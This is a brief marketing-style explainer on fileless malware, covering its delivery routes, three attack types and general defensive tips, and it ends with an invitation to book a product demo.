Fileless malware is a significant threat difficult to detect. A secondary concern with fileless malware is that it can often bypass current security controls and penetrate the system through the attack surface of legitimate programs. Fileless malware is not always easy to understand. Here we will look closer at fileless malware, and its different ways to compromise users at the micro level.
What is Fileless Malware?
Fileless malware is a type of malicious software that does not require installation on the computer. Such malware hides in the computer system and piggybacks on legitimate programs by performing malicious activity. Fileless malware is not file-based but memory-based. In other words, it leaves no footprint to be detected.
Fileless malware is a malicious code injected into some running process and executed only in RAM. Fileless malware exploits the system vulnerability and writes itself directly into memory. Fileless malware attacks can be hidden in documents and within documents.
What does Fileless Malware do?
Fileless malware like regular malware uses a computer’s system software, applications, and protocols to install malicious activity. Fileless malware activity ends when the system reboots.
Examples of such activities can be the following:
- Phishing emails
- Malicious downloads
- Malicious code injection in the already installed applications
- Malicious websites legitimate-looking alike (allow the code to run into the browser memory)
- Exploiting system vulnerability
- Initial access for stealing credentials or information
What are the types of Fileless Malware attacks?
Script-based attack
It is not completely fileless but still is difficult to spot. Script-based attack, known as SamSam ransomware, is a semi-fileless attack that, while used, does not allow the payload to be analysed without the initial script. The only way to capture the attack is to spot it while it happens.
Windows registry manipulation
It involves the usage of a malicious file that uses a normal Windows process to write fileless code into the registry.
Memory code injection
It hides malicious code in the memory of legitimate applications. When Windows activity is running, such malware reinjects itself into the running processes.
How to stay protected from Fileless Malware?
We suggest:
- Continuous monitoring of phishing emails. Be aware of phishing email signs
- Continuous monitoring of incoming and outgoing network traffic
- Constant memory analysis
- Conscious when downloading and installing new applications
- Having up-to-date software applications
- Having up-to-date browser
Fileless malware can be spotted. It requires a complex approach to a problem. Fileless malware attacks rely only on human vulnerability. It means that user behaviour is the central focus of cyber security.
With fileless malware, attackers have found a way to infect your computer without using files. Book a demo to learn how you can improve your human part of cyber security.
